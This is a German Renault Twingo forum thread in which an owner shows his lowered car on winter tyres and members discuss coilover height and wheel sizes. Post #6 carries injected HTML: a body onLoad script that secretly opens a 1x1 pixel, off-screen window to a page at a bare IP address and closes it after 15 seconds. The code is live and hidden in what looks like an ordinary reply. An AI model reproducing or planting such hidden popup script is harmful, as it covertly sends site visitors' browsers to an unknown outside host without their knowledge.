Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Mein Schatz. Winterreifen sind so ... "Nit schön"
#1
Servus,

hatte letzte Woche nach em Autoputzen Lust meine Winterreifen zu fotografieren. Hässlich gell?

Finde Winterreifen gehören verboten! *scherzmach*

Aber ich bin auf jedenfall wieder froh, wenn ich meine Sommerreifen aus dem Speicher holen kann!

Aber schaut selbst!

[Bild: twingo2.jpg]
[Bild: twingo3.jpg]
[Bild: twingo6.jpg]
[Bild: twingo8.jpg]

Und seit letzter Woche noch mit den Sitzen
[Bild: duw1.jpg]
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#2
Deinem stehen Winterreifen besser als meinem Smile Da gibts auch welche die denen noch weniger stehen. Aber hässlich sindse schon Wink

Würd mich ja mal interessieren wie der mit Sommerreifen aussieht: der sieht doch so schon gut aus :bescheuert:
Wo er seine Finger im Spiel hat(te):

die blaue Sau - mein 1. Twingo Arrow 1.6 16V K4M und einiges mehr - staubt gerade etwas ein Twisted Evil
Jahrhundertprojekt xXx - mein 2. Twingo Arrow Kompressormotor und vieles mehr in Vorbereitung Shocked
Fury - Lisa`s 1. Alltagstwingo Arrow schwarz, breit, stark / R.I.P. Crying or Very sad
PU - Lisa`s Schönwettertwingo Arrow 1.6 8V K7M & bling, bling Cool
Hot Brownie - Lisa`s 2. Alltagstwingo Arrow brauner Lack, beiges Leder & eigentlich am Thema "Alltag" vorbei Very Happy
Bärchenmobil - ein Übergangstwingo Arrow vorm Schrott gerettet & 2tes Leben spendiert Wink
der Professor - ein weiterer Übergangstwingo Arrow Kompressormotor und vieles mehr Razz
Kermit - sollte ein PickUp werden Arrow war hinterher fast ein Cabrio Rolling Eyes
Flippi - das Chamäleon Arrow leider nicht mehr zu retten gewesen Sad
Zitieren
Es bedanken sich:
#3
Hei Danke!

Naja, ich find Winterreifen stehen keinem Auto!

Sobald ich wieder sommerreifen drauf habe schick ich die Bilder wieder ins Forum!

Bonsai
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#4
Hübsch hübsch der Kleine... aber sag mal: wieviel tiefer ist der denn?!

Markus
Zitieren
Es bedanken sich:
#5
Tja, das isch ne gute Frage!

Isch en Gewindefahrwerk von HR drin! Und steht so ca. auf 3/4! Wieviel genau kann ich dir nicht sagen!

Grüssli Bonsai
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#6
Was für ne größe haben denn deine Sommerreifen? Hatte auch das H&R und musste es ganz nach oben schrauben.

Ben

<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>
Zitieren
Es bedanken sich:
#7
Was? Ganz nach oben! Dann hattest du mit Sicherheit 15" oder?

Meine Sommerreifen haebn 7x13 + 8x13!

Hinten hätte ich sogar noch richtig luft!

Bonsai
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#8
Jup, waren die Keskin 15" Wink
Zitieren
Es bedanken sich:
#9
Die habe ich mir auch schon überlegt, ich find aber das 15" einfach zu wuchtig sind für en Twingo! Denk ich hol mir 14" Borbet T! Die gefallen mir auch voll!

Bonsai
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#10
14" OZ F1 Cup Wink
Zitieren
Es bedanken sich:


Möglicherweise verwandte Themen…
Thema Verfasser Antworten Ansichten Letzter Beitrag
  Twingo "Black Gecko" von meinem Schatz Andy-Fox 4 6.022 05.03.2012, 19:32
Letzter Beitrag: Andy-Fox
  Mein "ollaguatsta" (kollegen sind auf den Namen gekommen) Enton 7 6.485 19.04.2011, 13:42
Letzter Beitrag: Enton
  Mein Phase 1 Bj. 96 - Mein Schatz hat mich Twingo-Fiziert :-) Andy-Fox 20 35.050 09.12.2010, 14:31
Letzter Beitrag: Andy-Fox
  mein roter schatz in arbeit rominchen89 25 25.612 09.10.2010, 13:26
Letzter Beitrag: coloniaBVB
  Mein neuer Schatz Deebase 7 5.733 03.10.2010, 21:32
Letzter Beitrag: janduisburg

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste